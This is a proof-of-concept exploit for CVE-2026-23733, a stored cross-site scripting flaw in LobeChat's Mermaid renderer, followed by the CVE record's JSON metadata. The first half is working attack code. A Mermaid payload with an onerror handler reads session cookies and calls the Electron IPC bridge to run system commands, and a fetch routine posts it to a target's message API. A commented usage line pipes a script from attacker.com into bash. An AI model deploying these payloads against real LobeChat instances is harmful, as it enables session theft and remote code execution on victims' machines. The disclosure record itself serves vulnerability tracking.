CVE-2026-23733

// CVE-2026-23733 PoC - Stored XSS in LobeChat Mermaid Renderer leading to RCE // Target: LobeChat < 2.0.0-next.180 const payload = `flowchart TD A["<img src=x onerror= // Extract session and trigger RCE via electronAPI const session = document.cookie; if (window.electronAPI) { window.electronAPI.send('execute-command', { command: 'calc.exe' // Example: Launch calculator }); } >"] A --> B["RCE Achieved"]`; // Send malicious Mermaid message via LobeChat API async function exploit(targetUrl, sessionToken) { const response = await fetch(`${targetUrl}/api/messages`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': `Bearer ${sessionToken}` }, body: JSON.stringify({ type: 'mermaid', content: payload }) }); return response.json(); } // Alternative: Direct command execution via IPC function rceViaIPC(command) { if (window.electronAPI && window.electronAPI.invoke) { window.electronAPI.invoke('shell:execute', { command: command, args: [] }); } } // Usage // exploit('https://lobechat-instance.com', 'user-session-token'); // rceViaIPC('curl http://attacker.com/shell.sh | bash');

{"cve": {"id": "CVE-2026-23733", "sourceIdentifier": "[email protected]", "published": "2026-01-18T23:15:48.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LobeChat is an open source chat application platform. Prior to version 2.0.0-next.180, a stored Cross-Site Scripting (XSS) vulnerability in the Mermaid artifact renderer allows attackers to execute arbitrary JavaScript within the application context. This XSS can be escalated to Remote Code Execution (RCE) by leveraging the exposed `electronAPI` IPC bridge, allowing attackers to run arbitrary system commands on the victim's machine. Version 2.0.0-next.180 patches the issue."}, {"lang": "es", "value": "LobeChat es una plataforma de aplicación de chat de código abierto. Antes de la versión 2.0.0-next.180, una vulnerabilidad de cross-site scripting (XSS) almacenado en el renderizador de artefactos Mermaid permite a los atacantes ejecutar JavaScript arbitrario dentro del contexto de la aplicación. Este XSS puede escalarse a ejecución remota de código (RCE) aprovechando el puente IPC 'electronAPI' expuesto, permitiendo a los atacantes ejecutar comandos de sistema arbitrarios en la máquina de la víctima. La versión 2.0.0-next.180 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.6, "impactScore": 5.3}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/lobehub/lobe-chat/security/advisories/GHSA-4gpc-rhpj-9443", "source": "[email protected]"}]}}